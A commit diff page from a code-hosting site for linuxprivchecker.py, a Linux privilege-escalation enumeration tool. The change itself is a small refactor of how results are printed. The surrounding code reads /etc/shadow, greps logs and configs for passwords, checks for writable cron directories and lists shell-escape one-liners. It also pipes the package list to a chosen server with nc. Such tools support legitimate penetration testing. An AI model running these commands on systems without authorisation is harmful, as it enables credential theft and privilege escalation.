crash.software
Projects
Pull Requests
Issues
Builds
linuxprivchecker
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY linuxprivchecker Commits 81c83980
🤬
  • ■ ■ ■ ■ ■ ■
    linuxprivchecker.py
    skipped 56 lines
    57 57   results = ['[-] failed: {}'.format(e)]
    58 58   cmdDict[item]["results"]=results
    59 59  
    60  - return cmdDict
     60 + printResults(cmdDict)
    61 61   
    62 62  # print results for each previously executed command, no return value
    63 63  def printResults(cmdDict):
    skipped 8 lines
    72 72   return
    73 73   
    74 74  def writeResults(msg, results):
    75  - f = open("privcheckout.txt", "a");
     75 + f = open("privcheckout.txt", "a")
    76 76   f.write("[+] " + str(len(results)-1) + " " + msg)
    77 77   for result in results:
    78 78   if result.strip() != "":
    skipped 11 lines
    90 90   "HOSTNAME":{"cmd":"hostname", "msg":"Hostname"}
    91 91   }
    92 92   
    93  -sysInfo = execCmd(sysInfo)
    94  -printResults(sysInfo)
     93 +execCmd(sysInfo)
    95 94   
    96 95  # Networking Info
    97 96   
    skipped 7 lines
    105 104   "SS":{"cmd":"ss -antup", "msg":"ss"}
    106 105   }
    107 106   
    108  -netInfo = execCmd(netInfo)
    109  -printResults(netInfo)
     107 +execCmd(netInfo)
    110 108   
    111 109  # File System Info
    112 110  print( "[*] GETTING FILESYSTEM INFO...\n")
    skipped 2 lines
    115 113   "FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries"}
    116 114   }
    117 115   
    118  -driveInfo = execCmd(driveInfo)
    119  -printResults(driveInfo)
     116 +execCmd(driveInfo)
    120 117   
    121 118  # Scheduled Cron Jobs
    122 119  cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs"},
    123 120   "CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs"}
    124 121   }
    125 122   
    126  -cronInfo = execCmd(cronInfo)
    127  -printResults(cronInfo)
     123 +execCmd(cronInfo)
    128 124   
    129 125  # User Info
    130 126  print("\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n")
    skipped 8 lines
    139 135   "LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity"}
    140 136   }
    141 137   
    142  -userInfo = execCmd(userInfo)
    143  -printResults(userInfo)
     138 +execCmd(userInfo)
    144 139   
    145 140  if "root" in userInfo["ID"]["results"][0]:
    146 141   print("[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n")
    skipped 8 lines
    155 150   "ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible"}
    156 151   }
    157 152   
    158  -fdPerms = execCmd(fdPerms)
    159  -printResults(fdPerms)
     153 +execCmd(fdPerms)
    160 154   
    161 155  pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'"},
    162 156   "CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'"},
    163 157   "SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)"}
    164 158   }
    165 159   
    166  -pwdFiles = execCmd(pwdFiles)
    167  -printResults(pwdFiles)
     160 +execCmd(pwdFiles)
    168 161   
    169 162  # Processes and Applications
    170 163  print("[*] ENUMERATING PROCESSES AND APPLICATIONS...\n")
    skipped 6 lines
    177 170  getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes"},
    178 171   "PKGS":{"cmd":getPkgs, "msg":"Installed Packages"}}
    179 172   
    180  -getAppProc = execCmd(getAppProc)
    181  -printResults(getAppProc) # comment to reduce output
     173 +execCmd(getAppProc)
    182 174   
    183 175  otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)"},
    184 176   "APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules"},
    185 177   "APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File"}}
    186 178   
    187  -otherApps = execCmd(otherApps)
    188  -printResults(otherApps)
     179 +execCmd(otherApps)
    189 180   
    190 181  print("[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n")
    191 182   
    skipped 41 lines
    233 224  print("\n[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n")
    234 225   
    235 226  devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools"}}
    236  -devTools = execCmd(devTools)
    237  -printResults(devTools)
     227 +execCmd(devTools)
    238 228   
    239 229  print("[+] Related Shell Escape Sequences...\n")
    240 230  escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]}
    skipped 10 lines
    251 241   port = input("[?] What port is the server using? ")
    252 242   print("[ ] Connecting to {}:{}".format(server,port))
    253 243   exploits = {"EXPLOITS":{"cmd":"dpkg -l | tail -n +6 | awk '{{print $2, $3}} END {{print \"\"}}' | nc {} {}".format(server, port), "msg":"Found the following possible exploits"}}
    254  - exploits_results = execCmd(exploits)
    255  - printResults(exploits)
     244 + execCmd(exploits)
    256 245   
    257 246  print("\n[+] Finished")
    258 247  print(bigline)
    skipped 1 lines
Please wait...
Page is in error, reload to recover